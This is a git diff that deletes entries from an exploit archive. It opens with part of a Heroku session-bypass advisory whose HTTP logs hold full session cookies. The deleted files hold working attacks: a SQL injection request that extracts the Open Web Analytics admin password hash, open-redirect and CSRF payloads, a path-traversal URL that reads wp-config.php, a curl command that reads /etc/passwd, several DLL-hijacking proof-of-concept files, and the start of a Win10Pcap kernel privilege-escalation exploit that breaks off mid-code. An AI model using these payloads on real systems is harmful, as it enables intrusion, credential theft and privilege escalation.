9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; path=/; expires=Sun, 21 Sep 2014 15:56:49 -0000; secure; HttpOnly] - x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359] - x-runtime[0.027082] - Via[1.1 vegur] - - -17:56:48.969[192ms][total 192ms] Status: 304[Not Modified] -GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] - Request Header: - Host[dataclips.heroku.com] - User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] - Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] - Accept-Language[de,en-US;q=0.7,en;q=0.3] - Accept-Encoding[gzip, deflate] - Referer[https://dataclips.heroku.com/] - Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; __utmb=148535982.67.9.1411228524365; optimizelyPendingLogEvents=%5B%5D] - Connection[keep-alive] - If-None-Match["809917d3d9ac788b43864dd9470788d6"] - Response Header: - Content-Length[0] - Connection[keep-alive] - Server[nginx/1.5.7] - Date[Sat, 20 Sep 2014 15:56:59 GMT] - status[304 Not Modified] - Strict-Transport-Security[max-age=31536000] - X-XSS-Protection[1; mode=block] - x-content-type-options[nosniff] - X-Frame-Options[SAMEORIGIN] - Etag["809917d3d9ac788b43864dd9470788d6"] - Cache-Control[max-age=0, private, must-revalidate] - Set-Cookie[_session_id=L0FpUHg1M3ZuUkNUeWtxVFNxdW1UY3p0QkM0OUNsVUMyL2VBN24xZVh3d1hlN2s5VUI5Tjl1b3BzV00yaW93elp0RGNKV3cxODh0VVVmSG9CeC9NSDh0WVVvekVqUkV5bHFaSStCUnkrZ21iWGRmVy96K210K01tQXo1SkxHRldLVVZYMFdiazVkcG96N3ZUWGZhK28vRWh5WS9id0ZIWTBTdU51a1dUaWRLK1gvWlI0WFRScW5PMU1MOURsLzV0QnRqdUhZWE9SSzdZRzVSazEzeko2Y01jZjFGRGNiUVRpQ0doSitISHpjSG8xT1JGamtVeDRKRjhBMHIxZkl5Q3N6bW9BODJqekNDMnhpRjExa3N3SlJpbU4xT1Rvc0Y3Uy9wNHdmMUVMbzV5OGxwK0N2bmJQdVJRazlOamRQbkJ5RXJuVmwvOW94azJhTHRMUzY4WkszdkU0cG9zaExXQ3FWUXZqRXpmc01DOFB5V1Nhbkp0bzhlejVCZGFaeFh6RGM3TTFqYkV5TXpGNVF3SkptRy95dkVTd1IyRS93SkVTVjYrRnF1dlFLa0Q2cGdKdkVDV0NoSkdrZDBiRzVyRFRmVHE3Z0hBb1pQbEM4RTBsT3NsNURYRlZoL0dSNUtsVjRjVFc3cFZFME1DUElhblRxTUdZYVMyUUFUaWQ0YUVMTytLZytVOHJaa3RQYVJzcUZ3RGZEWEFOdTBWT2Y1ZVQ0b0kzK2k3Z3MwPS0tQnhFMFYyVGxDODRjSXpIQ3g5R1ZhQT09--1ea1df64ab1a053df5ea5a4eed8a3bda7db428a8; path=/; expires=Sun, 21 Sep 2014 15:56:59 -0000; secure; HttpOnly] - x-request-id[433e3190-bc29-4192-9a61-90754e41bb44] - x-runtime[0.029809] - Via[1.1 vegur] - - - - -Reference(s): -https://dataclips.heroku.com/ -https://dataclips.heroku.com/clips/new -https://postgres.heroku.com/databases -- -https://dashboard.heroku.com/account -https://dashboard.heroku.com/login -https://id.heroku.com/logout - - -Solution - Fix & Patch: -======================= -The vulnerability can be patched by a secure proof of the dataclip and postgres service values that are processing to use the login credentials. -The service needs to process expired sessions through all portal in the same or next request without allowing to access separtly requested section with the expired session credentials. - - -Security Risk: -============== -The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information page is estimated as high. (CVSS 6.1) - - -Credits & Authors: -================== -Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] - - -Disclaimer & Information: -========================= -The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed -or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable -in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab -or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for -consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, -policies, deface websites, hack into databases or trade with fraud/stolen material. - -Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com -Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com -Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact -Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab -Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php -Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ - -Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to -electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by -Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website -is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact -(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. - - Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ - - - --- -VULNERABILITY LABORATORY - RESEARCH TEAM -SERVICE: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com -PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt - - - diff --git a/platforms/php/webapps/31738.txt b/platforms/php/webapps/31738.txt deleted file mode 100755 index cc0e24f5e..000000000 --- a/platforms/php/webapps/31738.txt +++ /dev/null @@ -1,93 +0,0 @@ -Dell SecureWorks Security Advisory SWRX-2014-001 -Open Web Analytics Pre-Auth SQL Injection - -Advisory Information -Title: Open Web Analytics Pre-Auth SQL Injection -Advisory ID: SWRX-2014-001 -Advisory URL: http://www.secureworks.com/cyber-threat-intelligence/advisories/SWRX-2014-001/ -Date published: Thursday, January 9, 2014 -CVE: CVE-2014-1206 -CVSS v2 base score: 7.5 -Date of last update: Wednesday, January 8, 2014 -Vendors contacted: Open Web Analytics -Release mode: Coordinated -Discovered by: Dana James Traversie, Dell SecureWorks - -Summary -Open Web Analytics (OWA) is open source web analytics software that can track and analyze how visitors use websites and applications. OWA is vulnerable to SQL injection that allows an attacker to execute arbitrary SQL statements in the context of the configured OWA database user without authenticating to the web application. - -Affected products -This vulnerability affects Open Web Analytics v1.5.4. - -Vendor Information, Solutions, and Workarounds -The vendor has released an updated version to address this vulnerability. OWA users should upgrade to version v1.5.5 or later. - -Details -An SQL injection vulnerability exists in Open Web Analytics v1.5.4 due to insufficient input validation of the ‘owa_email_address’ parameter on the password reset page. The password reset page does not require user authentication. A remote attacker can leverage this issue to execute arbitrary SQL statements in the context of the configured OWA database user. The impact of the vulnerability varies based on the deployment and configuration of the OWA, database, and web server software. Successful exploitation could result in complete loss of confidentiality, integrity, and availability in the OWA database and may affect the entire underlying database management system. This issue could also lead to operating system compromise under the right conditions. - -CVSS severity (version 2.0) -Access vector: Network -Access complexity: Low -Authentication: None -Impact type: Manipulation of SQL queries and execution of arbitrary SQL commands on the underlying -database -Confidentiality impact: Partial -Integrity impact: Partial -Availability impact: Partial -CVSS v2 base score: 7.5 -CVSS v2 impact subscore: 6.4 -CVSS v2 exploitability subscore: 10 -CVSS v2 vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) - -Proof of concept - -Request: - -POST /owa/index.php?owa_do=base.passwordResetForm HTTP/1.1 -Host: 10.11.28.70 -User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: https://10.11.28.70/owa/index.php?owa_do=base.passwordResetForm -Connection: keep-alive -Content-Type: application/x-www-form-urlencoded -Content-Length: 296 - -owa_email_address=-4534%27+UNION+ALL+SELECT+3627%2C3627%2C3627%2C3627%2C3627%2CCONCAT%280x7177766871%2CIFNULL%28CAST%28password+AS+CHAR%29%2C0x20%29%2C0x7176627971%29%2C3627%2C3627%2C3627%2C3627+FROM+owa.owa_user+LIMIT+0%2C1%23&owa_action=base.passwordResetRequest&owa_submit=Request+New+Password - -Response: - -HTTP/1.1 200 OK -Date: Fri, 14 Feb 2014 17:03:43 GMT -Server: Apache/2.2.15 (Red Hat) -X-Powered-By: PHP/5.3.3 -Content-Length: 3538 -Connection: close -Content-Type: text/html; charset=UTF-8 - -Invalid address: qwvhqe2744931d91565ed5b44a1d52746afa0qvbyq - - - - - - Open Web Analytics - -.. - -The password hash of the admin user included in the response: e2744931d91565ed5b44a1d52746afa0 - -Revision history -1.0 2014-01-09: Initial advisory release - -PGP keys -This advisory has been signed with the Dell SecureWorks Counter Threat Unit™ PGP key, which is -available for download at http://www.secureworks.com/SecureWorksCTU.asc. - -About Dell SecureWorks -Dell Inc. (NASDAQ: DELL) listens to customers and delivers worldwide innovative technology and business solutions they trust and value. Recognized as an industry leader by top analysts, Dell SecureWorks provides world-class information security services to help organizations of all sizes protect their IT assets, comply with regulations and reduce security costs. - -Disclaimer -Copyright © 2014 Dell SecureWorks -This advisory may not be edited or modified in any way without the express written consent of Dell SecureWorks. Permission is hereby granted to link to this advisory via the Dell SecureWorks website or use in accordance with the fair use doctrine of U.S. copyright laws. See the Dell SecureWorks terms of use at http://www.secureworks.com/contact/terms_of_use/ for additional information. -The most recent version of this advisory may be found on the Dell SecureWorks website at www.secureworks.com. The contents of this advisory may change or be removed from the website without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. ANY USE OF THIS INFORMATION IS AT THE USER'S RISK. In no event shall Dell SecureWorks be liable for any damages whatsoever arising out of or in connection with the use or further publication or disclosure of this information. \ No newline at end of file diff --git a/platforms/php/webapps/36025.txt b/platforms/php/webapps/36025.txt deleted file mode 100755 index 101c4f574..000000000 --- a/platforms/php/webapps/36025.txt +++ /dev/null @@ -1,66 +0,0 @@ -? -u5CMS 3.9.3 Multiple Open Redirect Vulnerabilities - - -Vendor: Stefan P. Minder -Product web page: http://www.yuba.ch -Affected version: 3.9.3 and 3.9.2 - -Summary: u5CMS is a little, handy Content Management System for medium-sized -websites, conference / congress / submission administration, review processes, -personalized serial mails, PayPal payments and online surveys based on PHP and -MySQL and Apache. - -Desc: Input passed via the 'uri' GET parameter in 'meta2.php' script and using -Cookie 'pidvesa' is not properly verified before being used to redirect users. -This can be exploited to redirect a user to an arbitrary website e.g. when a -user clicks a specially crafted link to the affected script hosted on a trusted -domain. - -============================================================================== -\u5admin\pidvesa.php: ---------------------- - -Line 5: if (''!='') location.href=''+'.php'; - -============================================================================== - -Tested on: Apache 2.4.10 (Win32) - PHP 5.6.3 - MySQL 5.6.21 - - -Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic - @zeroscience - - -Advisory ID: ZSL-2015-5227 -Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5227.php - - -29.12.2014 - ---- - - -#1 - -This request example adds '.php' at the end to the pidvesa cookie value: - -GET /u5cms/u5admin/pidvesa.php HTTP/1.1 -Host: 10.0.50.3 -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Cookie: PHPSESSID=mkmhuo3gquomkki4lurhap45o3; aclan=de; pidvesa=http://zeroscience.mk/evil/script; -Connection: keep-alive - - - To redirect to: http://zeroscience.mk/evil/script.php - - --- - -#2 - -GET /u5cms/u5admin/meta2.php?uri=http://zeroscience.mk HTTP/1.1 diff --git a/platforms/php/webapps/36039.txt b/platforms/php/webapps/36039.txt deleted file mode 100755 index cc7ca52ac..000000000 --- a/platforms/php/webapps/36039.txt +++ /dev/null @@ -1,13 +0,0 @@ -# Exploit Title: Wordpress Theme Divi Arbitrary File Download Vulnerability -# Date: 08/02/2015 -# Exploit Author: pool and Fran_73 -# Vendor Homepage: http://www.elegantthemes.com/gallery/divi/ -# Contact : ricof81@yahoo.com ( YM ) -# Tested on: Linux / Window -# Google Dork: inurl:wp-content/themes/Divi/ -###################### -# PoC -http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php - - - \ No newline at end of file diff --git a/platforms/php/webapps/37529.txt b/platforms/php/webapps/37529.txt deleted file mode 100755 index 640dd91b9..000000000 --- a/platforms/php/webapps/37529.txt +++ /dev/null @@ -1,43 +0,0 @@ -Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0 -Author: Larry W. Cashdollar, @_larry0 -Date: 2015-07-01 -Download Site: https://wordpress.org/plugins/mdc-youtube-downloader -Vendor: https://profiles.wordpress.org/mukto90/ -Vendor Notified: 2015-07-01, removed vulnerable code. -Vendor Contact: n.mukto@gmail.com -Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site. -Vulnerability: -The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system allowing sensitive files to be -downloaded: - -$file_name = $_GET['file']; - -// make sure it's a file before doing anything! -if(is_file($file_name)) { -. -. -. - switch(strtolower(substr(strrchr($file_name, '.'), 1))) { - case 'pdf': $mime = 'application/pdf'; break; - case 'zip': $mime = 'application/zip'; break; - case 'jpeg': - case 'jpg': $mime = 'image/jpg'; break; - default: $mime = 'application/force-download'; - } - header('Pragma: public'); // required - header('Expires: 0'); // no cache - header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); - header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT'); - header('Cache-Control: private',false); - header('Content-Type: '.$mime); - header('Content-Disposition: attachment; filename="'.basename($file_name).'"'); - header('Content-Transfer-Encoding: binary'); - header('Content-Length: '.filesize($file_name)); // provide file size - header('Connection: close'); - readfile($file_name); // push it out - exit(); - -CVEID: Requested, TBD. -OSVDB: TBD. -Exploit Code: - • $ curl http://server/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd diff --git a/platforms/php/webapps/38690.html b/platforms/php/webapps/38690.html deleted file mode 100755 index 2e67e203d..000000000 --- a/platforms/php/webapps/38690.html +++ /dev/null @@ -1,19 +0,0 @@ -source: http://www.securityfocus.com/bid/61702/info - -BigTree CMS is prone to a cross-site request-forgery vulnerability. - -Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. - -BigTree CMS 4.0 RC2 is vulnerable; other versions may also be affected. - -
- - - - - - -
- diff --git a/platforms/windows/local/36555.c b/platforms/windows/local/36555.c deleted file mode 100755 index 2f9d206f4..000000000 --- a/platforms/windows/local/36555.c +++ /dev/null @@ -1,265 +0,0 @@ -/* -#[+] Author: TUNISIAN CYBER -#[+] Exploit Title: BZR Player 1.03 DLL Hijacking -#[+] Date: 29-03-2015 -#[+] Type: Local Exploits -#[+] Vendor: http://bzrplayer.blazer.nu/ -#[+] Tested on: WinXp/Windows 7 Pro -#[+] Friendly Sites: sec4ever.com -#[+] Twitter: @TCYB3R -#[+] gcc -shared -o [DLLNAME_choose one from the lis below].dll tcyber.c -# Copy it to the software dir. then execute the software , calc.exe will launch :). -#Vulnerable and Exploitable DLLs: -output_dsound.dll -codec_cdda.dll -output_writer_nrt.dll -output_nosound.dll -output_nosound_nrt.dll -codec_tag.dll -codec_cdda.dll -codec_fsb.dll -codec_vag.dll -codec_.dll -codec_oggvorbis.dll -codec_tremor.dll -codec_fsb.dll -codec_aiff.dll -codec_flac.dll -codec_mod.dll -codec_s3m.dll -codec_xm.dll -codec_it.dll -codec_midi.dll -codec_dls.dll -codec_sf2.dll -codec_asf.dll -codec_vag.dll -codec_playlist.dll -codec_mpeg.dll -dsp_oscillator.dll -dsp_fft.dll -dsp_lowpass.dll -dsp_lowpass2.dll -dsp_lowpass_simple.dll -dsp_highpass.dll -dsp_echo.dll -dsp_delay.dll -codec_.dll -dsp_flange.dll -dsp_tremolo.dll -dsp_distortion.dll -dsp_normalize.dll -dsp_parameq.dll -dsp_pitchshift.dll -dsp_chorus.dll -dsp_reverb.dll -dsp_sfxreverb.dll -dsp_itecho.dll -codec_oggvorbis.dll -dsp_compressor.dll -dsp_dolbyheadphones.dll -output_dsound.dll -output_winmm.dll -output_wasapi.dll -output_asio.dll -output_writer.dll -output_writer_nrt.dll -output_nosound.dll -output_nosound_nrt.dll -codec_tremor.dll -codec_tag.dll -codec_cdda.dll -codec_fsb.dll -codec_vag.dll -codec_.dll -codec_oggvorbis.dll -codec_tremor.dll -codec_aiff.dll -codec_flac.dll -codec_mod.dll -codec_aiff.dll -codec_s3m.dll -codec_xm.dll -codec_it.dll -codec_midi.dll -codec_dls.dll -codec_sf2.dll -codec_asf.dll -codec_playlist.dll -codec_mpeg.dll -dsp_oscillator.dll -codec_flac.dll -dsp_fft.dll -dsp_lowpass.dll -dsp_lowpass2.dll -dsp_lowpass_simple.dll -dsp_highpass.dll -dsp_echo.dll -dsp_delay.dll -dsp_flange.dll -dsp_tremolo.dll -dsp_distortion.dll -codec_mod.dll -dsp_normalize.dll -dsp_parameq.dll -dsp_pitchshift.dll -dsp_chorus.dll -dsp_reverb.dll -dsp_sfxreverb.dll -dsp_itecho.dll -dsp_compressor.dll -dsp_dolbyheadphones.dll -output_dsound.dll -codec_s3m.dll -output_winmm.dll -output_wasapi.dll -output_asio.dll -output_writer.dll -output_writer_nrt.dll -output_nosound.dll -output_nosound_nrt.dll -codec_tag.dll -codec_cdda.dll -codec_fsb.dll -output_winmm.dll -codec_xm.dll -codec_vag.dll -codec_.dll -codec_oggvorbis.dll -codec_tremor.dll -codec_aiff.dll -codec_flac.dll -codec_mod.dll -codec_s3m.dll -codec_xm.dll -codec_it.dll -codec_it.dll -codec_midi.dll -codec_dls.dll -codec_sf2.dll -codec_asf.dll -codec_playlist.dll -codec_mpeg.dll -dsp_oscillator.dll -dsp_fft.dll -dsp_lowpass.dll -dsp_lowpass2.dll -codec_midi.dll -dsp_lowpass_simple.dll -dsp_highpass.dll -dsp_echo.dll -dsp_delay.dll -dsp_flange.dll -dsp_tremolo.dll -dsp_distortion.dll -dsp_normalize.dll -dsp_parameq.dll -dsp_pitchshift.dll -codec_dls.dll -dsp_chorus.dll -dsp_reverb.dll -dsp_sfxreverb.dll -dsp_itecho.dll -dsp_compressor.dll -dsp_dolbyheadphones.dll -codec_sf2.dll -codec_asf.dll -codec_playlist.dll -codec_mpeg.dll -dsp_oscillator.dll -dsp_fft.dll -output_wasapi.dll -dsp_lowpass.dll -dsp_lowpass2.dll -dsp_lowpass_simple.dll -dsp_highpass.dll -dsp_echo.dll -dsp_delay.dll -dsp_flange.dll -dsp_tremolo.dll -dsp_distortion.dll -dsp_normalize.dll -output_asio.dll -dsp_parameq.dll -dsp_pitchshift.dll -dsp_chorus.dll -dsp_reverb.dll -dsp_sfxreverb.dll -dsp_itecho.dll -dsp_compressor.dll -dsp_dolbyheadphones.dll -output_dsound.dll -output_winmm.dll -output_writer.dll -output_wasapi.dll -output_asio.dll -output_writer.dll -output_writer_nrt.dll -output_nosound.dll -output_nosound_nrt.dll -codec_tag.dll -codec_cdda.dll -codec_fsb.dll -codec_vag.dll -output_writer_nrt.dll -codec_.dll -codec_oggvorbis.dll -codec_tremor.dll -codec_aiff.dll -codec_flac.dll -codec_mod.dll -codec_s3m.dll -codec_xm.dll -codec_it.dll -codec_midi.dll -output_nosound.dll -codec_dls.dll -codec_sf2.dll -codec_asf.dll -codec_playlist.dll -codec_mpeg.dll -dsp_oscillator.dll -dsp_fft.dll -dsp_lowpass.dll -dsp_lowpass2.dll -dsp_lowpass_simple.dll -output_nosound_nrt.dll -dsp_highpass.dll -dsp_echo.dll -dsp_delay.dll -dsp_flange.dll -dsp_tremolo.dll -dsp_distortion.dll -dsp_normalize.dll -dsp_parameq.dll -dsp_pitchshift.dll -dsp_chorus.dll -codec_tag.dll -dsp_reverb.dll -dsp_sfxreverb.dll -dsp_itecho.dll -dsp_compressor.dll -dsp_dolbyheadphones.dll -output_dsound.dll -output_winmm.dll -output_wasapi.dll -output_asio.dll -output_writer.dll -#Proof of Concept (PoC): -======================= -*/ - -#include - -int tunisian() -{ -WinExec("calc", 0); -exit(0); -return 0; -} - -BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) -{ -tunisian(); -return 0; -} \ No newline at end of file diff --git a/platforms/windows/local/36556.c b/platforms/windows/local/36556.c deleted file mode 100755 index ccc615e4d..000000000 --- a/platforms/windows/local/36556.c +++ /dev/null @@ -1,29 +0,0 @@ -/* -#[+] Author: TUNISIAN CYBER -#[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking -#[+] Date: 29-03-2015 -#[+] Type: Local Exploits -#[+] Vendor: http://www.recoverlostpassword.com/products/zippasswordrecovery.html#compare -#[+] Tested on: WinXp/Windows 7 Pro -#[+] Friendly Sites: sec4ever.com -#[+] Twitter: @TCYB3R -#[+] gcc -shared -o dwmapi.dll tcyber.c -# Copy it to the software dir. then execute the software , calc.exe will launch :). -Proof of Concept (PoC): -======================= -*/ - -#include - -int tunisian() -{ -WinExec("calc", 0); -exit(0); -return 0; -} - -BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) -{ -tunisian(); -return 0; -} \ No newline at end of file diff --git a/platforms/windows/local/36557.txt b/platforms/windows/local/36557.txt deleted file mode 100755 index aa3c7b720..000000000 --- a/platforms/windows/local/36557.txt +++ /dev/null @@ -1,20 +0,0 @@ -#[+] Author: TUNISIAN CYBER -#[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking -#[+] Date: 28-03-2015 -#[+] Type: Local Exploits -#[+] Vendor: https://httrack.com/page/2/fr/index.html -#[+] Tested on: WinXp/Windows 7 Pro -#[+] Friendly Sites: sec4ever.com -#[+] Twitter: @TCYB3R -#[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that -# the 2 files are in the same dir. -#include -#define DllExport __declspec (dllexport) -DllExport void hook_startup() { exp(); } - -int exp() -{ - WinExec("calc", 0); - exit(0); - return 0; -} \ No newline at end of file diff --git a/platforms/windows/local/36558.txt b/platforms/windows/local/36558.txt deleted file mode 100755 index e9cae7ee2..000000000 --- a/platforms/windows/local/36558.txt +++ /dev/null @@ -1,20 +0,0 @@ -#[+] Author: TUNISIAN CYBER -#[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking -#[+] Date: 28-03-2015 -#[+] Type: Local Exploits -#[+] Tested on: WinXp/Windows 7 Pro -#[+] Friendly Sites: sec4ever.com -#[+] Twitter: @TCYB3R -#[+] Poc:http://i.imgur.com/naHAdJF.png -#[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that -# the 2 files are in the same dir. -#include -#define DllExport __declspec (dllexport) -DllExport void hook_startup() { exp(); } - -int exp() -{ - WinExec("calc", 0); - exit(0); - return 0; -} \ No newline at end of file diff --git a/platforms/windows/local/36700.txt b/platforms/windows/local/36700.txt deleted file mode 100755 index 3fc3cf794..000000000 --- a/platforms/windows/local/36700.txt +++ /dev/null @@ -1,22 +0,0 @@ -#[+] Author: PETER CHENG - -#[+] Exploit Title: Elipse SCADA DLL Hijacking -#[+] Date: 09-04-2015 -#[+] Type: Local Exploits -#[+] Tested on: WinXp/Windows 7 Pro -#[+] Vendor Homepage: http://www.elipse.com.br/ -#[+] Software Link: http://www.elipse.com.br/eng/download_scada.aspx -#[+] Version: Elipse32.exe version - 2.29 b141] -#[+] Create and Compile the file then rename it to wfapi.dll and put it to the dir which the same with file Elipse32.exe, double-click #to run Elipse32.exe to launch the app. - - -#include -#define DllExport __declspec (dllexport) -DllExport void hook_startup() { exp(); } - -int exp() -{ - WinExec("calc", 0); - exit(0); - return 0; -} diff --git a/platforms/windows/local/38542.cpp b/platforms/windows/local/38542.cpp deleted file mode 100755 index 1361d870b..000000000 --- a/platforms/windows/local/38542.cpp +++ /dev/null @@ -1,205 +0,0 @@ -# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit - -/* -Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address - -you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code - -IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1" - -ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES - -overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS) -#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) -#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) - -/* found with : -!token -1: kd> dt nt!_OBJECT_HEADER - +0x000 PointerCount : Int4B - +0x004 HandleCount : Int4B - +0x004 NextToFree : Ptr32 Void - +0x008 Lock : _EX_PUSH_LOCK - +0x00c TypeIndex : UChar - +0x00d TraceFlags : UChar - +0x00e InfoMask : UChar - +0x00f Flags : UChar - +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION - +0x010 QuotaBlockCharged : Ptr32 Void - +0x014 SecurityDescriptor : Ptr32 Void - +0x018 Body : _QUAD - -TypeIndex is 0x5 -*/ -#define HANDLE_TYPE_TOKEN 0x5 - - -// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation -const SYSTEM_INFORMATION_CLASS SystemHandleInformation = -(SYSTEM_INFORMATION_CLASS)16; - -// The NtQuerySystemInformation function and the structures that it returns -// are internal to the operating system and subject to change from one -// release of Windows to another. To maintain the compatibility of your -// application, it is better not to use the function. -typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)( - IN SYSTEM_INFORMATION_CLASS SystemInformationClass, - OUT PVOID SystemInformation, - IN ULONG SystemInformationLength, - OUT PULONG ReturnLength OPTIONAL - ); - -// Undocumented structure: SYSTEM_HANDLE_INFORMATION -typedef struct _SYSTEM_HANDLE -{ - ULONG ProcessId; - UCHAR ObjectTypeNumber; - UCHAR Flags; - USHORT Handle; - PVOID Object; - ACCESS_MASK GrantedAccess; -} SYSTEM_HANDLE, *PSYSTEM_HANDLE; - -typedef struct _SYSTEM_HANDLE_INFORMATION -{ - ULONG NumberOfHandles; - SYSTEM_HANDLE Handles[1]; -} SYSTEM_HANDLE_INFORMATION, 